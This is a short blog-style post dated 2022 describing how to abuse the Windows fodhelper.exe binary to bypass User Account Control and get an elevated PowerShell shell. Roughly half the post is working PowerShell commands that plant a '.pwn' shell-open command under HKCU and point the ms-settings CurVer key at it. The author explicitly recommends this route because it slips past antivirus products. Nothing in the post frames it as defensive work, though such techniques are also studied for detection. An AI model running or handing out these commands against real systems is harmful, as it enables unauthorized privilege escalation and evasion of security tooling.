Exploiting the Windows “Feature on Demand” Helper

author: Nathan Acks
date: 2022-09-02

The fodhelper binary can be abused to gain an admin shell on Windows boxes with a couple of registry key changes. They key (heh) here is to use the CurVer registry key to point fodhelper.exe to a different registry location; otherwise most AV solutions will catch this change and block it (though sometimes the command will still execute).

New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" `
	-Name "(default)" -Value "cmd.exe /c start powershell.exe" -Force
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" `
	-Name "(default)" -value ".pwn" -Force